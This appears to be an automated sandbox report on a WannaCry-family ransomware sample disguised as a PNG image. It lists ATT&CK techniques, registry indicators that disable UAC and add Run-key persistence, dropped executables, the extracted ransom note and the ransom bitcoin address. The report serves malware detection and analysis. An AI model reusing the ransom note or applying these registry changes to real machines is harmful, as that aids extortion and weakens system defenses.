wannacry | 40da1cd16fd7dff442fbf3241b58b5857012b0f3c28d84c59b7ff5b97f0ee735

Resubmissions

15-08-2024 00:06

240815-ad6gwsydjm 3

13-08-2024 12:24

13-08-2024 12:19

13-08-2024 12:11

13-08-2024 12:03

13-08-2024 12:02

Analysis

max time kernel
208s
max time network
207s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
13-08-2024 12:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rocket-league-spotify-artwork.png
Size

833KB
MD5

28952f1e3e40281a2fab2de9f228bc8a
SHA1

b4db183ea6ad6b6cc31c8cae5c6feba5352a1242
SHA256

40da1cd16fd7dff442fbf3241b58b5857012b0f3c28d84c59b7ff5b97f0ee735
SHA512

26a4d65a82d7594dd7cc65ecf372cd4abeb2367b7dc4589eb5e1ca55b868fae15995f0f3921580348d46e1bf2a6d803ceaad48792dde38c90ae593de8088d0b6
SSDEEP

12288:BXhYChvXgQEOUmrify0TXJq8UXyTIU8sGEcqu6vO3QSWh8Xsq0BD4jJyJoc2HaP6:jHFgQEjQsq3yckGDP3Qvq0BD4jJyJoB

Score

10^/10

wannacry defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (78) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8BF2.tmp	Process not Found
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD8BF9.tmp	Process not Found

Executes dropped EXE 64 IoCs

pid	Process
4012	satan.exe
3064	satan.exe
4264	orbeu.exe
4464	orbeu.exe
3964	ViraLock.exe
1240	oqUgQMUM.exe
340	JgYkoUIo.exe
4444	ViraLock.exe
5096	ViraLock.exe
2628	ViraLock.exe
2176	ViraLock.exe
2420	ViraLock.exe
5104	ViraLock.exe
1592	ViraLock.exe
2180	ViraLock.exe
788	ViraLock.exe
5104	ViraLock.exe
3868	ViraLock.exe
8	ViraLock.exe
2768	ViraLock.exe
1984	ViraLock.exe
1592	ViraLock.exe
1828	ViraLock.exe
3804	ViraLock.exe
1900	ViraLock.exe
1812	ViraLock.exe
3568	ViraLock.exe
4912	ViraLock.exe
1900	ViraLock.exe
4228	ViraLock.exe
1924	ViraLock.exe
2420	ViraLock.exe
1068	ViraLock.exe
3148	ViraLock.exe
3804	ViraLock.exe
1592	ViraLock.exe
1860	ViraLock.exe
1944	ViraLock.exe
1352	ViraLock.exe
3148	ViraLock.exe
4548	ViraLock.exe
4912	ViraLock.exe
5300	ViraLock.exe
5464	ViraLock.exe
5892	ViraLock.exe
5908	ViraLock.exe
5272	ViraLock.exe
5340	ViraLock.exe
5508	ViraLock.exe
5344	ViraLock.exe
5492	ViraLock.exe
3352	ViraLock.exe
1068	ViraLock.exe
5280	ViraLock.exe
1444	ViraLock.exe
5604	ViraLock.exe
6048	ViraLock.exe
1092	ViraLock.exe
5204	ViraLock.exe
5732	ViraLock.exe
5164	ViraLock.exe
6076	ViraLock.exe
6072	ViraLock.exe
4228	ViraLock.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\{7D0E5D1B-23D3-741B-5056-89006DF8340B} = "C:\\Users\\Admin\\AppData\\Roaming\\Leefy\\orbeu.exe"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\oqUgQMUM.exe = "C:\\Users\\Admin\\sGgswYoY\\oqUgQMUM.exe"	ViraLock.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\JgYkoUIo.exe = "C:\\ProgramData\\rcMUYMwY\\JgYkoUIo.exe"	ViraLock.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\oqUgQMUM.exe = "C:\\Users\\Admin\\sGgswYoY\\oqUgQMUM.exe"	oqUgQMUM.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\JgYkoUIo.exe = "C:\\ProgramData\\rcMUYMwY\\JgYkoUIo.exe"	JgYkoUIo.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
46	raw.githubusercontent.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\shell32.dll.exe	oqUgQMUM.exe
File opened for modification	C:\Windows\SysWOW64\shell32.dll.exe	oqUgQMUM.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	Process not Found

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
4464	orbeu.exe
4464	orbeu.exe
4464	orbeu.exe
4464	orbeu.exe
4464	orbeu.exe
3860	Conhost.exe
3860	Conhost.exe
3860	Conhost.exe
3860	Conhost.exe
4076	Conhost.exe
4076	Conhost.exe
4076	Conhost.exe
4076	Conhost.exe
1944	Process not Found
1944	Process not Found
1944	Process not Found
1944	Process not Found
404	Conhost.exe
404	Conhost.exe
404	Conhost.exe
404	Conhost.exe
2320	Conhost.exe
2320	Conhost.exe
2320	Conhost.exe
2320	Conhost.exe
5812	Process not Found
5812	Process not Found
5812	Process not Found
5812	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
5224	Process not Found
5224	Process not Found
5224	Process not Found
5224	Process not Found
632	Process not Found
632	Process not Found
632	Process not Found
632	Process not Found
6128	Conhost.exe
6128	Conhost.exe
6128	Conhost.exe
6128	Conhost.exe
6032	Process not Found
6032	Process not Found
6032	Process not Found
6032	Process not Found
5580	Process not Found
5580	Process not Found
5580	Process not Found
5580	Process not Found
5480	Process not Found
5480	Process not Found
5480	Process not Found
5480	Process not Found
5764	Process not Found
5764	Process not Found
5764	Process not Found

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4012 set thread context of 3064	4012	satan.exe	119
PID 4264 set thread context of 4464	4264	orbeu.exe	123

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 3 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	Process not Found
File opened for modification	C:\Users\Admin\Downloads\satan.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ViraLock.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

